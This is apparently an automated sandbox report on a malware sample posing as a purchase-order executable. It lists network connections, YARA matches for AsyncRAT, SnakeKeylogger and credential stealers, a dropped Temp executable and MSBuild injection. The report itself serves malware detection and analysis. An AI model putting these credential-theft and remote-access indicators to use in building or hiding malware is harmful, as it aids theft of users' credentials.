Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown HTTPS traffic detected: 20.190.177.147:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49947 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.BQ_PO#385995.exe.2760a49b688.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.BQ_PO#385995.exe.2760a493c48.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.MSBuild.exe.7240000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 3.2.MSBuild.exe.7240000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.MSBuild.exe.45b5fa8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 3.2.MSBuild.exe.45b5fa8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.MSBuild.exe.45b5fa8.1.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 3.2.MSBuild.exe.45b5fa8.1.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.MSBuild.exe.7240000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 3.2.MSBuild.exe.7240000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.0.ubygsn.exe.980000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4586871157.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000E.00000000.2385310132.0000000000982000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4616809591.0000000007240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000003.00000002.4616809591.0000000007240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2258559792.000002760A47C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000002.4606149598.000000000441A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 6524, type: MEMORYSTR Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: ubygsn.exe PID: 3700, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe, type: DROPPED Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: BQ_PO#385995.exe
Abnormal high CPU Usage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD3447D489 0_2_00007FFD3447D489
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD3447A520 0_2_00007FFD3447A520
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34477E60 0_2_00007FFD34477E60
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD3447B8BB 0_2_00007FFD3447B8BB
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34477898 0_2_00007FFD34477898
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34472158 0_2_00007FFD34472158
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD3447A901 0_2_00007FFD3447A901
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34472A2C 0_2_00007FFD34472A2C
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD3447C300 0_2_00007FFD3447C300
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34483457 0_2_00007FFD34483457
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34479545 0_2_00007FFD34479545
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD3447EE2A 0_2_00007FFD3447EE2A
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34478F4C 0_2_00007FFD34478F4C
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD344760ED 0_2_00007FFD344760ED
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD344721D3 0_2_00007FFD344721D3
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD344721FA 0_2_00007FFD344721FA
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD3447920C 0_2_00007FFD3447920C
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD3447B28C 0_2_00007FFD3447B28C
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD344713B5 0_2_00007FFD344713B5
Source: C:\Users\user\Desktop\BQ_PO#385995.exe Code function: 0_2_00007FFD34550002 0_2_00007FFD34550002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0198C090 3_2_0198C090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_01986238 3_2_01986238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_01985968 3_2_01985968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_01988ED2 3_2_01988ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0198CE68 3_2_0198CE68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_01985220 3_2_01985220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_01980B70 3_2_01980B70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02DEB490 8_2_02DEB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_02DEB470 8_2_02DEB470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_08613E98 8_2_08613E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04B4B490 11_2_04B4B490
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_00F02BE8 14_2_00F02BE8
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_00F0C638 14_2_00F0C638
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_00F027D4 14_2_00F027D4
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_00F05888 14_2_00F05888
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_00F05AD8 14_2_00F05AD8
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0101C146 14_2_0101C146
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_01015362 14_2_01015362
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0101D278 14_2_0101D278
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0101C468 14_2_0101C468
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0101C738 14_2_0101C738
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0101E988 14_2_0101E988
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_010169A0 14_2_010169A0
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0101CA08 14_2_0101CA08
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_01019DE0 14_2_01019DE0
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0101CCD8 14_2_0101CCD8
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0101CFA9 14_2_0101CFA9
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_01016FC8 14_2_01016FC8
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_01013E09 14_2_01013E09
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0101F961 14_2_0101F961
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0101E97B 14_2_0101E97B
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_010129EC 14_2_010129EC
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_010139F0 14_2_010139F0
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_01013AA1 14_2_01013AA1
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06989C70 14_2_06989C70
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_0698FC68 14_2_0698FC68
Source: C:\Users\user\AppData\Local\Temp\ubygsn.exe Code function: 14_2_06989548 14_2_06989548
